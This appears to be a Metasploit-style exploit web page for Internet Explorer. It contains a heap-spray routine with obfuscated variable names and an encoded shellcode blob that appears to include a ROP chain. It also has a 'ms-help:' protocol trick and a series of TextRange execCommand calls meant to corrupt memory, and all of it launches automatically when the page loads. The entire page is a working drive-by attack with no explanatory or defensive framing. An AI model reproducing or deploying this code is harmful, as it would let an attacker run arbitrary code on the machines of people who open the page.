<html>
  <head>
    <meta http-equiv='Cache-Control' content='no-cache'/>
    <meta http-equiv="X-UA-Compatible" content="IE=edge" >
    <script>
      var NxWbMZf;
function sprayHeap( oArg ) {
  var shellcode     = oArg.shellcode;
  var offset        = oArg.offset;
  var heapBlockSize = oArg.heapBlockSize;
  var maxAllocs     = oArg.maxAllocs;
  var ZujmSnwWMkQKVYVVtifrPMUSELdTHEId         = oArg.ZujmSnwWMkQKVYVVtifrPMUSELdTHEId;

  if (shellcode     == undefined)  { throw "Missing argument: shellcode"; }
  if (offset        == undefined)  { offset        = 0x00; }
  if (heapBlockSize == undefined)  { heapBlockSize = 0x80000; }
  if (maxAllocs     == undefined)  { maxAllocs     = 0x350; }

  if (offset > 0x800) { throw "Bad alignment"; }

  NxWbMZf = document.getElementById(ZujmSnwWMkQKVYVVtifrPMUSELdTHEId);

  if (NxWbMZf == null) {
    NxWbMZf = document.createElement("div");
  }

  NxWbMZf.style.cssText = "display:none";
  var zaEeYCpGQAhvJOymgncv;
  v = unescape("%u2020%u2020");
  while (v.length < offset+0x1000) v += v;

  zaEeYCpGQAhvJOymgncv = v.substring(0,offset) + shellcode;
  zaEeYCpGQAhvJOymgncv += v.substring(0,0x800-offset-shellcode.length);

  while (zaEeYCpGQAhvJOymgncv.length < heapBlockSize) zaEeYCpGQAhvJOymgncv += zaEeYCpGQAhvJOymgncv;

  for (var i = 0; i < maxAllocs; i++)
  {
    var ZujmSnwWMkQKVYVVtifrPMUSELdTHE = document.createElement("button");
    ZujmSnwWMkQKVYVVtifrPMUSELdTHE.title = zaEeYCpGQAhvJOymgncv.substring(0, (heapBlockSize-2)/2);
    NxWbMZf.appendChild(ZujmSnwWMkQKVYVVtifrPMUSELdTHE);
  }
}
      sprayHeap({shellcode:unescape("%ub376%u51c3%u046e%u51c2%u4a41%u51be%ub376%u51c3%ub376%u51c3%ub376%u51c3%ub376%u51c3%ub376%u51c3%ub376%u51c3%ub376%u51c3%ub376%u51c3%ub376%u51c3%ub376%u51c3%ub376%u51c3%ub376%u51c3%ub376%u51c3%ub376%u51c3%ub376%u51c3%ub376%u51c3%ub376%u51c3%ub376%u51c3%ub376%u51c3%ub376%u51c3%ub376%u51c3%ub376%u51c3%ub376%u51c3%ub376%u51c3%ub376%u51c3%ub376%u51c3%ub376%u51c3%ub376%u51c3%ub376%u51c3%ub376%u51c3%ub376%u51c3%ub376%u51c3%ub376%u51c3%ub376%u51c3%ub376%u51c3%ub376%u51c3%ub376%u51c3%ub376%u51c3%ub376%u51c3%ub376%u51c3%ub376%u51c3%ub376%u51c3%ub376%u51c3%ub376%u51c3%ub376%u51c3%u046e%u51c2%u28d4%u51bd%ue4fa%u51c0%ue4fa%u51c0%ua2b4%u51c3%uff17%uffff%u9351%u51c3%u5188%u51bf%uae64%u1817%u9351%u51c3%ua429%u51bf%uffc0%uffff%ua84d%u51be%u5188%u51bf%ud702%u868a%ua84d%u51be%uc4b1%u51c3%uc638%u51c5%ube1d%u51bd%u5383%u51bd%u3335%u51c4%uc7cb%u51bf%u6452%u51c4%u10b8%u51bd%u604e%u51c3%u4534%u51be%uc481%ufe0c%uffff%u66be%u9f4f%udaf8%ud9d4%u2474%u5af4%uc931%u33b1%u7231%u8312%ufcea%u1403%u7d41%u240d%u08b5%ud4ee%u6b46%u3166%ub977%u321c%u0d2a%u1656%ue6c7%u823a%u8a5c%ua592%u21d5%u88c5%u87e6%u46c9%u8924%u94b5%u6979%u5787%u688c%u85c0%u387f%uc299%uadd2%u96ae%uccee%u9d60%ub74f%u6105%u0d3b%ub107%u1a94%u294f%u459e%u4870%u9673%u034c%u6df8%u9226%ubc28%ua5c7%u1314%u0af6%u6d99%uac3e%u1842%ucf34%u1bff%ub28f%uaedb%u1412%u09af%ua5f7%ucf7c%ua97c%u9bc9%uaddb%u48cc%uc950%u6f45%u58b7%u541d%u0113%uf5c5%uef02%u0aa8%u5754%uaf14%u751e%uc941%u137c%u5b94%u5afb%u6396%ucc04%u52ff%u838f%u6b78%ue05a%u2177%u40c7%uec10%ud19d%u0f7d%u1548%u8c78%ue579%u8c7f%ue00b%u0ac4%u98e7%uff55%u0f07%u2a55%uce64%ub6c5%u7545%u5c6e%u419a")});

      function hxds() {
        try {
          location.href = 'ms-help:';
        } catch(e) {}
      }

      function strike() {
        hxds();
        var fake = "";
        for (var i = 0; i < 12; i++) {
          if (i==0) {
             fake += unescape("%u1020%u0c0d");
          }
          else {
            fake += "\u4141\u4141";
          }
        }

        var elements = [
          'FOOTER', 'VIDEO', 'HTML', 'DIV', 'WBR', 'THEAD', 'PARAM', 'SECTION', 'IMG',
          'TIME', 'ASISE', 'CANVAS', 'P', 'RT', 'FRAMESET', 'TRACK', 'CAPTION'
        ];

        for (var i = 0; i < elements.length; i++) {
          var element = document.createElement(elements[i]);
          document.body.appendChild(element);
        }

        var tRange = document.body.createTextRange();
        tRange.moveToElementText(document.body.children[16]);
        tRange.execCommand('InsertInputSubmit', true, null);
        tRange.moveToElementText(document.body.children[0]);
        tRange.moveEnd('character',4);
        tRange.execCommand('InsertOrderedList', true, null);
        tRange.select();
        tRange.moveToElementText(document.body.children[0]);
        tRange.moveEnd('character',13);
        tRange.execCommand('Underline', true, null);
        tRange.execCommand('RemoveFormat', true, null);
        var fillObject = document.createElement('button');
        fillObject.className = fake;
      }
    </script>
  </head>
  <body onload='strike();'></body>
</html>
